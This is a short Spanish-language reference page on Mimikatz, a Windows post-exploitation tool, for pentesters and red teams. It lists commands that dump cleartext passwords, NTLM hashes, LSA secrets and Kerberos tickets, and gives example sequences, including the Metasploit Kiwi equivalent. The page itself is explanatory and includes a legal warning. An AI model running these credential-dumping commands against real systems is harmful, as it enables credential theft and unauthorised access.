🧠 Mimikatz - Extracción avanzada de credenciales

Mimikatz es una herramienta de post-explotación desarrollada por Benjamin Delpy que permite extraer credenciales, hashes, certificados y tickets de un sistema Windows.

🧬 ¿Para qué sirve?

Con Mimikatz se puede:

  • Obtener contraseñas en texto claro desde memoria
  • Volcar hashes de usuario (LM/NTLM)
  • Acceder a secretos de LSA
  • Ver e inyectar tickets Kerberos
  • Elevar privilegios usando tokens

⚙️ Funcionalidades principales

ComandoFunción
sekurlsa::logonpasswordsExtrae contraseñas y hashes desde LSASS
lsadump::samVolca hashes del archivo SAM
lsadump::lsaExtrae secretos guardados por el sistema
kerberos::listLista tickets Kerberos
kerberos::pttInyecta un ticket (Pass-The-Ticket)
token::elevateEleva privilegios con tokens impersonados
privilege::debugHabilita privilegios requeridos para ejecutar comandos

🖥️ Requisitos

  • Ejecutar como Administrador o SYSTEM
  • Puede requerir desactivar protecciones como:
    • Credential Guard
    • LSA Protection

🧪 Ejemplo de uso

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

🔄 Relación con Metasploit

En Metasploit, podés usar Kiwi, una versión embebida de Mimikatz dentro de meterpreter, sin subir binarios.

meterpreter > load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords

🛡️ Precauciones legales

Mimikatz es una herramienta poderosa que debe usarse solo en entornos autorizados. Su uso en sistemas sin permiso es ilegal y puede traer consecuencias penales.

✅ Ideal para pentesters, red teams, análisis forense y laboratorios de seguridad.

herramientas